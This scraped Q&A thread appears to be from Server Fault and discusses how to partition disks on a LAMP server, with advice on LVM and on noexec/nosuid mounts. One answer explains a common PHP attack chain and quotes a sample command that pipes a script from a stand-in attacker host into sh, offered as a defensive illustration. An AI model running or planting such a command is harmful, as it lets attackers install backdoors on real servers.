Suggested Linux partitions layout for an LAMP server?
Solution 1
I suggest using your OS's default layout unless you have some special considerations, e.g. as large amounts of data, very high usage, potentially large growth.
You can always expand later ... for example we often have: /tmp /boot / Should mysql get bogged down due to disk IO we can add another disk or SAN mount at /var/lib/mysql
If your doc root is /var/www, you can always mount more disk resources as well.
Some will tout performance benefits of using a more fine grained system, but I often find the claims do not hold up in real-world applications or have little performance impact because the system is not disk IO limited.
Solution 2
If nothing else matters *sings along with Metallica*, you should at least take care that you have a separate mount for PHP uploads / temporary files and for your web root mounted with nosuid,noexec flags. That stops about 99% of script kiddie attacks.
Why?
Because practically all of them seem to use pattern like
1) Find a weakness in some PHP script, like passing arbitrary code via some URL parameter.
2.1) Upload a file containing C code or a shell script from some nice web form you have there in your site.
or
2.2) Make your web server download and execute some nasty code via URL parameters like `system("curl http://icanhazyourcheezburger.com/ipwnj00.sh | sh") or so. Some of these instruct your server to first fetch the C source code and compile it with gcc, so disabling gcc from Apache user is a good idea, too.
3) See how you have a nice backdoor installed in your server.
So, how does noexec,nosuid help in this case? No code would be executed at all. Yeah yeah, that CAN be overridden, but it's getting harder and anyway security is made of layers, this noexec,nosuid thing is just one of them.
Solution 3
I usually do the following (using Debian):
I put everything into LVM (this works with Grub2).
- /boot 1GB (space for a rescue/install cd image or something else tricky. Can be kept off LVM if you are cautious).
- / 5-10 GB, maybe 20GB if I need Matlab or something else in /opt
- /home size depends on server (what kind of users? how many? how much data?)
- /var again size depends on server (logfiles, mostly)
- /srv and again size depends, but this is where I would put docroot (/srv/www)
Specifically I do not fill up the entire VG, as that gives me more room to play as requirements change. And growing filesystems can be done online using LVM.
Related videos on Youtube
34 : 08
16 : 28
17 : 11
05 : 49
03 : 27
HopelessN00b
Updated on September 17, 2022Comments
-
HopelessN00b over 1 year
I need some suggestions on what would be the best approach for the partition layout for an LAMP server, that is LINUX + APACHE + PHP + MYSQL.
-
Lennert about 14 years+1 for de-fault. linux admins have a long history of turning partition layouts into minefields of over-engineering one-upsmanship. Unless you have some pre-existing design and a well thought case for it, trust your distro.
-
ivanacorovic about 14 yearsWhat's wrong? It is mybe there are some inaccuracies, but I don't understand what's wrong. -
ivanacorovic about 14 yearsThe only inaccuracie I found: 1. if you want a partitions for log, it will be /var/log, not /var, as I wrote I found also not only useless, but also harmful give negative feedback without explanation, because not only the policies of the site tell that it should be given, but it is also meaningful because with an explanation the author of the erroneous texts and the other readers can learn, while without such explanations the right thing to do could be to leave sarverfault for ever, either for questions, either for answers.
-
Aaron Copley over 13 yearsThis is why you don't answer with just a link. The site is now down and no one can see the content. sigh
-
NuckinFutz over 13 yearsYeah, that sucks. I suppose that's to be expected. Luckily the Internet Archive has a copy: web.archive.org/web/20080609200241/http://sial.org/howto/…
